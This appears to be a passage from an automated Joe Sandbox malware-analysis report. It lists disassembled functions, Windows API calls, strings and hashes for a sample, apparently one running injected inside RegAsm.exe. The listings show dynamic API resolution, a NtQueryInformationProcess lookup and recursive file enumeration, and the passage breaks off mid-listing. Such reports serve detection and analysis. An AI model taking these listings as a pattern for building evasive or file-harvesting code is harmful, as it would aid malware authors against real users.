Opcode Fuzzy Hash: 8e9e55974ba0b474bae9bb0052f0ec2ad6669421670d9ce1f1421b33c7220e68
Instruction Fuzzy Hash: 2EE01231294208B7DF111B61ED06F693B599B00B50F154031FB0DA42E1EB61D865E689

Uniqueness

Uniqueness Score: -1.00%

Function 009E7870 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(CEFD0730,00000000,00000000,00000000), ref: 009E78D3

Part of subcall function 009E8FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,009E6B60,?,00000000,-00000008), ref: 009E905B

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009E7B2E
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009E7B76
GetLastError.KERNEL32 ref: 009E7C19

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 1b2663449f077d6c630c3f50c71242eac844f283665582a58229eba8aa137844
Instruction ID: 3d73c1255a2f4ec9c2b5453e169542790ec88d78563c1c39bb160e34ce8cb365
Opcode Fuzzy Hash: 1b2663449f077d6c630c3f50c71242eac844f283665582a58229eba8aa137844
Instruction Fuzzy Hash: 10D168B5D082899FCB16CFE9D880AADFBB8FF48304F28452AE955E7351D730A941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009D9791 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 009D9858
___AdjustPointer.LIBCMT ref: 009D987B
___AdjustPointer.LIBCMT ref: 009D9917

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: dfd695d4d70c41bcc62f938db7c7c6fa2ba74936d69f7ce003e9558ca644fbb5
Instruction ID: 10934aa78505394f0239d1150e01cc0c6b7aede39093f0e7f3603a8b27386618
Opcode Fuzzy Hash: dfd695d4d70c41bcc62f938db7c7c6fa2ba74936d69f7ce003e9558ca644fbb5
Instruction Fuzzy Hash: F0510771A802069FDB29AF54D881B7A73A8FF95B14F14C52FE80657391D732EC41E790

Uniqueness

Uniqueness Score: -1.00%

Function 009E93CB Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 009E8FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,009E6B60,?,00000000,-00000008), ref: 009E905B

GetLastError.KERNEL32 ref: 009E942F
__dosmaperr.LIBCMT ref: 009E9436
GetLastError.KERNEL32(?,?,?,?), ref: 009E9470
__dosmaperr.LIBCMT ref: 009E9477

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: c3ed833ebe52c4a78727fdd9e540c57359f3f1b99ade8164cdd1d887fe8109a0
Instruction ID: acce592c1489f0b3dbe7d149c18f41c2e196621de6f217c90b0bcd200a389f2f
Opcode Fuzzy Hash: c3ed833ebe52c4a78727fdd9e540c57359f3f1b99ade8164cdd1d887fe8109a0
Instruction Fuzzy Hash: E421B631204355BFDB22AF639C8096B77ACEF843A47108519FA25972A1E730EC518790

Uniqueness

Uniqueness Score: -1.00%

Function 009E01EB Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02712e726e79c73ecef606cc27c9acb7ae5d5f655f684b1861956c7db6ad510f
Instruction ID: a4cf9c49514f85bbf4ccd47d6024df692595655a1b12db41b189ddc86b982f6d
Opcode Fuzzy Hash: 02712e726e79c73ecef606cc27c9acb7ae5d5f655f684b1861956c7db6ad510f
Instruction Fuzzy Hash: 0D218331600285AF9B22AFA2DC4992B77EDAFC43657104515F67597341DBB0EC90C790

Uniqueness

Uniqueness Score: -1.00%

Function 009EA361 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 009EA369

Part of subcall function 009E8FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,009E6B60,?,00000000,-00000008), ref: 009E905B

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009EA3A1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009EA3C1

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: f05cea0f039cb3d14dbc469effb725fb5f021f97c2feb6ef902cdce38cc8e82d
Instruction ID: c3cef37154a74f253188a31efaadc145d648b9efde3bd10b059a028196ed4007
Opcode Fuzzy Hash: f05cea0f039cb3d14dbc469effb725fb5f021f97c2feb6ef902cdce38cc8e82d
Instruction Fuzzy Hash: AF11F9F1A196997F6B1367B35C8ADBF295CDED43A53211424F501D1111FF24ED8092B2

Uniqueness

Uniqueness Score: -1.00%

Function 00A19B41 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00A19B67

Part of subcall function 00A19993: __fltout2.LIBCMT ref: 00A199BE

__cftog_l.LIBCMT ref: 00A19B8D
__cftoe_l.LIBCMT ref: 00A19BBF

Memory Dump Source

Source File: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 06d906a3704249ec737f7486683cb69ef406697ef67ba034a1aec8762e0ac746
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 8611487200814EBBCF125F84DC62CEE3F67BF58794B588415FA1859131D23ACAB2EB81

Uniqueness

Uniqueness Score: -1.00%

Function 009D1D84 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 009D1D90
int.LIBCPMT ref: 009D1DA3

Part of subcall function 009D2577: std::_Lockit::_Lockit.LIBCPMT ref: 009D2588
Part of subcall function 009D2577: std::_Lockit::~_Lockit.LIBCPMT ref: 009D25A2

std::_Facet_Register.LIBCPMT ref: 009D1DD6
std::_Lockit::~_Lockit.LIBCPMT ref: 009D1DEC

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 7407d8e7e2c509bb1ac038f49e3ef5971fda91f7d0f67d5c5a6b028e0d84e3ac
Instruction ID: 240d6fda42ef5545e1bdb5b872ea2f67124e7a48ca889af9d8cfb0e3ae1900b0
Opcode Fuzzy Hash: 7407d8e7e2c509bb1ac038f49e3ef5971fda91f7d0f67d5c5a6b028e0d84e3ac
Instruction Fuzzy Hash: 7101A236980118BBCB15AB94D9169AD776DDF80760B20815AF911AB3E1EB30DE41D790

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A4C8 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00A1A4D4

Part of subcall function 00A1AE2C: __getptd_noexit.LIBCMT ref: 00A1AE2F
Part of subcall function 00A1AE2C: __amsg_exit.LIBCMT ref: 00A1AE3C

__amsg_exit.LIBCMT ref: 00A1A4F4
__lock.LIBCMT ref: 00A1A504
_free.LIBCMT ref: 00A1A534

Memory Dump Source

Source File: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
Instruction ID: bda56727ea22976e4f2fbceb434ca3b483e354f73ecd40873159ab77098bd4d8
Opcode Fuzzy Hash: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
Instruction Fuzzy Hash: E301D231E06721ABDB21EB64A9067DE73A0BF60730F040125E94567280C734ADC1CFDB

Uniqueness

Uniqueness Score: -1.00%

Function 009F0A5F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,009EF92B,00000000,00000001,00000000,00000000,?,009E7C6D,00000000,00000000,00000000), ref: 009F0A76
GetLastError.KERNEL32(?,009EF92B,00000000,00000001,00000000,00000000,?,009E7C6D,00000000,00000000,00000000,00000000,00000000,?,009E81F4,00000000), ref: 009F0A82

Part of subcall function 009F0A48: CloseHandle.KERNEL32(FFFFFFFE,009F0A92,?,009EF92B,00000000,00000001,00000000,00000000,?,009E7C6D,00000000,00000000,00000000,00000000,00000000), ref: 009F0A58

___initconout.LIBCMT ref: 009F0A92

Part of subcall function 009F0A0A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,009F0A39,009EF918,00000000,?,009E7C6D,00000000,00000000,00000000,00000000), ref: 009F0A1D

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,009EF92B,00000000,00000001,00000000,00000000,?,009E7C6D,00000000,00000000,00000000,00000000), ref: 009F0AA7

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 782b753789fa519e91eb14204c33237b0b5b4896d3ae956c0b7de00e8d111451
Instruction ID: ccf3fc28e37a3a1be13202d812d109ff1d8f236b55b0a3ceb60f61141e9f9dce
Opcode Fuzzy Hash: 782b753789fa519e91eb14204c33237b0b5b4896d3ae956c0b7de00e8d111451
Instruction Fuzzy Hash: 1BF01C36514258BBCF625FE9EC08ABA3F6AFB983A1F144010FB1985131C732C860EB90

Uniqueness

Uniqueness Score: -1.00%

Function 009D9D8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 009D9DB2

Strings

MOC, xrefs: 009D9DC4
RCC, xrefs: 009D9DCC

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: ff84455351737ca70e5fcf4c8eba7fb891f309eb06403b5ffdd5d55709f38774
Instruction ID: e687b397264c8a689f01754cc456b75a13f77060a21a0e4aee0921d39e1b56f7
Opcode Fuzzy Hash: ff84455351737ca70e5fcf4c8eba7fb891f309eb06403b5ffdd5d55709f38774
Instruction Fuzzy Hash: BA414872940209AFCF15EF98C981AEEBBB9FF48304F18809AFA0577361D7359950DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D1FF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 009D2000
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009D2038

Part of subcall function 009D472C: _Yarn.LIBCPMT ref: 009D474B
Part of subcall function 009D472C: _Yarn.LIBCPMT ref: 009D476F

Strings

bad locale name, xrefs: 009D2046

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 9e0bc0600f58312514c74466dcc4973226fc2e932b952f13ab8d28fe5ccee62d
Instruction ID: 8c1536522aa4181e87f599ed88319f2fadccb4100f1be6391e6996856d9b05c3
Opcode Fuzzy Hash: 9e0bc0600f58312514c74466dcc4973226fc2e932b952f13ab8d28fe5ccee62d
Instruction Fuzzy Hash: 1FF0F471546B409E83319F6A8481547FBE4BE69250390CA2FE1DEC3A11D730A444CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 009E0FE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 009E0FE7
GetCommandLineW.KERNEL32 ref: 009E0FF2

Strings

8%d, xrefs: 009E0FED

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: 8%d
API String ID: 3253501508-1997871260
Opcode ID: 08567b98954d59bae8cacd70b4ee005a08d358a025b781f1db77609a5931ccb8
Instruction ID: 628e18a60245b08849b34845741f7a6f432cab1b1139b1ce7a1eed124737ce41
Opcode Fuzzy Hash: 08567b98954d59bae8cacd70b4ee005a08d358a025b781f1db77609a5931ccb8
Instruction Fuzzy Hash: 9CB092788292009FC7008F30B82C2253BE1BA083023844475D611C2330DBB90280FF09

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 7408, Parent PID: 7348COMMON

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	9.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	35

Executed Functions

Function 00418970 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 208
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
GetProcAddress.KERNEL32(00000000,0151F240), ref: 00418990
GetProcAddress.KERNEL32(74DD0000,0151F198), ref: 004189BD
GetProcAddress.KERNEL32(74DD0000,0151F1C8), ref: 004189D6
GetProcAddress.KERNEL32(74DD0000,0151F210), ref: 004189EE
GetProcAddress.KERNEL32(74DD0000,0151F540), ref: 00418A06
GetProcAddress.KERNEL32(74DD0000,01522E60), ref: 00418A1F
GetProcAddress.KERNEL32(74DD0000,015225C0), ref: 00418A37
GetProcAddress.KERNEL32(74DD0000,015228C0), ref: 00418A4F
GetProcAddress.KERNEL32(74DD0000,0151F4C8), ref: 00418A68
GetProcAddress.KERNEL32(74DD0000,0151F498), ref: 00418A80
GetProcAddress.KERNEL32(74DD0000,0151F4E0), ref: 00418A98
GetProcAddress.KERNEL32(74DD0000,0151F528), ref: 00418AB1
GetProcAddress.KERNEL32(74DD0000,01522660), ref: 00418AC9
GetProcAddress.KERNEL32(74DD0000,0151F4F8), ref: 00418AE1
GetProcAddress.KERNEL32(74DD0000,0151F510), ref: 00418AFA
GetProcAddress.KERNEL32(74DD0000,015225E0), ref: 00418B12
GetProcAddress.KERNEL32(74DD0000,0151F480), ref: 00418B2A
GetProcAddress.KERNEL32(74DD0000,0151F4B0), ref: 00418B43
GetProcAddress.KERNEL32(74DD0000,01522600), ref: 00418B5B
GetProcAddress.KERNEL32(74DD0000,0151CB00), ref: 00418B73
GetProcAddress.KERNEL32(74DD0000,01522720), ref: 00418B8C
LoadLibraryA.KERNEL32(0152DA20), ref: 00418B9D
LoadLibraryA.KERNEL32(0152DA38), ref: 00418BAF
LoadLibraryA.KERNEL32(0152D8A0), ref: 00418BC1
LoadLibraryA.KERNEL32(0152DB28), ref: 00418BD2
LoadLibraryA.KERNEL32(0152DA98), ref: 00418BE4
GetProcAddress.KERNEL32(75A70000,0152D990), ref: 00418C00
GetProcAddress.KERNEL32(75290000,0152D9A8), ref: 00418C1C
GetProcAddress.KERNEL32(75290000,0152D930), ref: 00418C34
GetProcAddress.KERNEL32(75BD0000,0152D918), ref: 00418C50
GetProcAddress.KERNEL32(75450000,01522740), ref: 00418C6C
GetProcAddress.KERNEL32(76E90000,01522DB0), ref: 00418C88
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00418C9F

Strings

NtQueryInformationProcess, xrefs: 00418C94
kernel32.dll, xrefs: 00418970

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess$kernel32.dll
API String ID: 2238633743-258108907
Opcode ID: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
Instruction ID: 54f81618b0003c9a7d9cd87b1105554b9cb69cd8690f86f09dc99c509db4cf5f
Opcode Fuzzy Hash: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
Instruction Fuzzy Hash: 3D9134BDA002029FD744DFA4EC6896637FBF78EB413A06519FA05C7360EB349885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00416740 Relevance: 49.3, APIs: 23, Strings: 5, Instructions: 334
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0041677A
FindFirstFileA.KERNEL32(?,?,?,00416D98,00416EE5), ref: 00416791
memset.MSVCRT ref: 004167A9
memset.MSVCRT ref: 004167BB
StrCmpCA.SHLWAPI(?,00428648,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041680C
StrCmpCA.SHLWAPI(?,0042864C,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 00416826
wsprintfA.USER32 ref: 0041684B
StrCmpCA.SHLWAPI(?,0042835F,?,?,?,?,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041685D
wsprintfA.USER32 ref: 00416885
memset.MSVCRT ref: 004168BD
lstrcat.KERNEL32(?,?), ref: 004168D0
strtok_s.MSVCRT ref: 004168E6
strtok_s.MSVCRT ref: 00416913
memset.MSVCRT ref: 0041692C
lstrcat.KERNEL32(?,?), ref: 0041693C
strtok_s.MSVCRT ref: 00416952
PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041696A

Strings

%s\%s, xrefs: 004168A1
%s\*.*, xrefs: 0041676F
%s%s, xrefs: 004169A3
%s\%s\%s, xrefs: 0041687F
%s\%s, xrefs: 00416845

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 1425701045-3225784412
Opcode ID: 8626fca86b05ac8aaf2817f9b7a50739662535e5c9a0d08921c2eb99929d4ad6
Instruction ID: 9df80aab3b2c67129cd77f9efb50d4b945a18d7e013ca70540632bd8ef74930f
Opcode Fuzzy Hash: 8626fca86b05ac8aaf2817f9b7a50739662535e5c9a0d08921c2eb99929d4ad6
Instruction Fuzzy Hash: 16C1DAB5900209ABCB14DFA4DC85EEE77B8EF49704F50855EF505A3281DB389E88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4F0 Relevance: 42.9, APIs: 18, Strings: 6, Instructions: 913
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

